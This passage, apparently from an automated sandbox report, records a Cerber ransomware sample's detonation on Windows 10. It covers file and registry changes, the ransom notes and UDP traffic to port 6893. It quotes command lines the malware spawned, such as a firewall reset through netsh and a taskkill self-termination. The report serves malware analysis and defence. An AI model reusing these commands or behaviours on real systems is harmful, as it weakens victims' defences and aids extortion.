US 204.8.99.144:443 dist.torproject.org tcp
US 8.8.8.8:53 dist.torproject.org udp
DE 116.202.120.166:443 dist.torproject.org tcp
US 8.8.8.8:53 166.120.202.116.in-addr.arpa udp
DE 116.202.120.166:443 dist.torproject.org tcp

Files

memory/392-0-0x00007FFEB40A5000-0x00007FFEB40A6000-memory.dmp

memory/392-1-0x00007FFEB3DF0000-0x00007FFEB4791000-memory.dmp

memory/392-2-0x000000001D4D0000-0x000000001D99E000-memory.dmp

memory/392-3-0x000000001BC60000-0x000000001BCFC000-memory.dmp

memory/392-4-0x000000001BD80000-0x000000001BDE2000-memory.dmp

memory/392-5-0x000000001BB70000-0x000000001BB78000-memory.dmp

memory/392-6-0x000000001DBA0000-0x000000001DBF2000-memory.dmp

memory/392-14-0x00007FFEB3DF0000-0x00007FFEB4791000-memory.dmp

memory/392-15-0x00007FFEB40A5000-0x00007FFEB40A6000-memory.dmp

memory/392-16-0x00007FFEB3DF0000-0x00007FFEB4791000-memory.dmp

memory/392-17-0x00007FFEB3DF0000-0x00007FFEB4791000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-26 15:24

Reported

2024-11-26 15:27

Platform

win10v2004-20241007-en

Max time kernel

145s

Max time network

146s

Command Line

"C:\Users\Admin\AppData\Local\Temp\cerber.exe"

Signatures

Cerber

ransomware cerber

Cerber family

cerber

Contacts a large (1101) amount of remote hosts

discovery

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A

Drops startup file

Description Indicator Process Target
File opened for modification \??\c:\users\admin\appdata\roaming\microsoft\word\startup\ C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\microsoft sql server C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\outlook C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\word C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\powerpoint C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\steam C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\bitcoin C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\excel C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\excel C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\excel C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\office C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\steam C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\thunderbird C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\documents C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft sql server C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\office C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\powerpoint C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\word C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\outlook C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\bitcoin C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\outlook C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\onenote C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\the bat! C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft sql server C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\onenote C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\the bat! C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\thunderbird C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\office C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\word C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\office C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\outlook C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\powerpoint C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\word C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\desktop C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\excel C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\microsoft sql server C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\onenote C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\powerpoint C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\onenote C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\tmpE772.bmp" C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification \??\c:\program files (x86)\steam C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\the bat! C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\microsoft sql server C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\outlook C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\microsoft\excel C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\microsoft\microsoft sql server C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\microsoft\office C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\microsoft\outlook C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\powerpoint C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\thunderbird C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\ C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\bitcoin C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\word C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\excel C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\microsoft\powerpoint C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\microsoft\word C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\office C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\onenote C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files\ C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\microsoft\onenote C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\thunderbird C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\thunderbird C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\excel C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\word C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\word C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\powerpoint C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\thunderbird C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\word C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\onenote C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\the bat! C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\excel C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\microsoft sql server C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\office C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\onenote C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\outlook C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\desktop C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\excel C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\excel C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\outlook C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\onenote C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\word C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\word C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\documents C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\excel C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\steam C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\documents C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\desktop C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\bitcoin C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\onenote C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\steam C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\office C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\onenote C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\the bat! C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\thunderbird C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\powerpoint C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\onenote C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\outlook C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\bitcoin C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft sql server C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\microsoft sql server C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\microsoft sql server C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\onenote C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\excel C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft sql server C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\outlook C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\outlook C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\office C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\outlook C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\steam C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\word C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\ C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\bitcoin C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft sql server C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\microsoft sql server C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\powerpoint C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\word C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\outlook C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\onenote C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\powerpoint C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\steam C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\the bat! C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\office C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\office C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\office C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\NOTEPAD.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\PING.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\NOTEPAD.EXE N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4052 wrote to memory of 2624 N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe C:\Windows\SysWOW64\netsh.exe
PID 4052 wrote to memory of 2624 N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe C:\Windows\SysWOW64\netsh.exe
PID 4052 wrote to memory of 2624 N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe C:\Windows\SysWOW64\netsh.exe
PID 4052 wrote to memory of 4336 N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe C:\Windows\SysWOW64\netsh.exe
PID 4052 wrote to memory of 4336 N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe C:\Windows\SysWOW64\netsh.exe
PID 4052 wrote to memory of 4336 N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe C:\Windows\SysWOW64\netsh.exe
PID 4052 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe C:\Windows\SysWOW64\mshta.exe
PID 4052 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe C:\Windows\SysWOW64\mshta.exe
PID 4052 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe C:\Windows\SysWOW64\mshta.exe
PID 4052 wrote to memory of 4980 N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe C:\Windows\SysWOW64\NOTEPAD.EXE
PID 4052 wrote to memory of 4980 N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe C:\Windows\SysWOW64\NOTEPAD.EXE
PID 4052 wrote to memory of 4980 N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe C:\Windows\SysWOW64\NOTEPAD.EXE
PID 4052 wrote to memory of 4488 N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe C:\Windows\SysWOW64\cmd.exe
PID 4052 wrote to memory of 4488 N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe C:\Windows\SysWOW64\cmd.exe
PID 4052 wrote to memory of 4488 N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe C:\Windows\SysWOW64\cmd.exe
PID 4488 wrote to memory of 3276 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 4488 wrote to memory of 3276 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 4488 wrote to memory of 3276 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 4488 wrote to memory of 2136 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4488 wrote to memory of 2136 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4488 wrote to memory of 2136 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE

Processes

C:\Users\Admin\AppData\Local\Temp\cerber.exe

"C:\Users\Admin\AppData\Local\Temp\cerber.exe"

C:\Windows\SysWOW64\netsh.exe

C:\Windows\system32\netsh.exe advfirewall set allprofiles state on

C:\Windows\SysWOW64\netsh.exe

C:\Windows\system32\netsh.exe advfirewall reset

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\_R_E_A_D___T_H_I_S___QJOD_.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\_R_E_A_D___T_H_I_S___V8ODSW6_.txt

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im "cerber.exe"

C:\Windows\SysWOW64\PING.EXE

ping -n 1 127.0.0.1

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 149.177.190.20.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
FR 178.33.158.0:6893 udp
FR 178.33.158.1:6893 udp
FR 178.33.158.2:6893 udp
FR 178.33.158.3:6893 udp
FR 178.33.158.4:6893 udp
FR 178.33.158.5:6893 udp
FR 178.33.158.6:6893 udp
FR 178.33.158.7:6893 udp
FR 178.33.158.8:6893 udp
FR 178.33.158.9:6893 udp
FR 178.33.158.10:6893 udp
FR 178.33.158.11:6893 udp
FR 178.33.158.12:6893 udp
FR 178.33.158.13:6893 udp
FR 178.33.158.14:6893 udp
FR 178.33.158.15:6893 udp
FR 178.33.158.16:6893 udp
FR 178.33.158.17:6893 udp
FR 178.33.158.18:6893 udp
FR 178.33.158.19:6893 udp
FR 178.33.158.20:6893 udp
FR 178.33.158.21:6893 udp
FR 178.33.158.22:6893 udp
FR 178.33.158.23:6893 udp
FR 178.33.158.24:6893 udp
FR 178.33.158.25:6893 udp
FR 178.33.158.26:6893 udp
FR 178.33.158.27:6893 udp
FR 178.33.158.28:6893 udp
FR 178.33.158.29:6893 udp
FR 178.33.158.30:6893 udp
FR 178.33.158.31:6893 udp
FR 178.33.159.0:6893 udp
FR 178.33.159.1:6893 udp
FR 178.33.159.2:6893 udp
FR 178.33.159.3:6893 udp
FR 178.33.159.4:6893 udp
FR 178.33.159.5:6893 udp
FR 178.33.159.6:6893 udp
FR 178.33.159.7:6893 udp
FR 178.33.159.8:6893 udp
FR 178.33.159.9:6893 udp
FR 178.33.159.10:6893 udp
FR 178.33.159.11:6893 udp
FR 178.33.159.12:6893 udp
FR 178.33.159.13:6893 udp
FR 178.33.159.14:6893 udp
FR 178.33.159.15:6893 udp
FR 178.33.159.16:6893 udp
FR 178.33.159.17:6893 udp
FR 178.33.159.18:6893 udp
FR 178.33.159.19:6893 udp
FR 178.33.159.20:6893 udp
FR 178.33.159.21:6893 udp
FR 178.33.159.22:6893 udp
FR 178.33.159.23:6893 udp
FR 178.33.159.24:6893 udp
FR 178.33.159.25:6893 udp
FR 178.33.159.26:6893 udp
FR 178.33.159.27:6893 udp
FR 178.33.159.28:6893 udp
FR 178.33.159.29:6893 udp
FR 178.33.159.30:6893 udp
FR 178.33.159.31:6893 udp
FR 178.33.160.0:6893 udp
FR 178.33.160.1:6893 udp
FR 178.33.160.2:6893 udp
FR 178.33.160.3:6893 udp
FR 178.33.160.4:6893 udp
FR 178.33.160.5:6893 udp
FR 178.33.160.6:6893 udp
FR 178.33.160.7:6893 udp
FR 178.33.160.8:6893 udp
FR 178.33.160.9:6893 udp
FR 178.33.160.10:6893 udp
FR 178.33.160.11:6893 udp
FR 178.33.160.12:6893 udp
FR 178.33.160.13:6893 udp
FR 178.33.160.14:6893 udp
FR 178.33.160.15:6893 udp
FR 178.33.160.16:6893 udp
FR 178.33.160.17:6893 udp
FR 178.33.160.18:6893 udp
FR 178.33.160.19:6893 udp
FR 178.33.160.20:6893 udp
FR 178.33.160.21:6893 udp
FR 178.33.160.22:6893 udp
FR 178.33.160.23:6893 udp
FR 178.33.160.24:6893 udp
FR 178.33.160.25:6893 udp
FR 178.33.160.26:6893 udp
FR 178.33.160.27:6893 udp
FR 178.33.160.28:6893 udp
FR 178.33.160.29:6893 udp
FR 178.33.160.30:6893 udp
FR 178.33.160.31:6893 udp
FR 178.33.160.32:6893 udp
FR 178.33.160.33:6893 udp
FR 178.33.160.34:6893 udp
FR 178.33.160.35:6893 udp
FR 178.33.160.36:6893 udp
FR 178.33.160.37:6893 udp
FR 178.33.160.38:6893 udp
FR 178.33.160.39:6893 udp
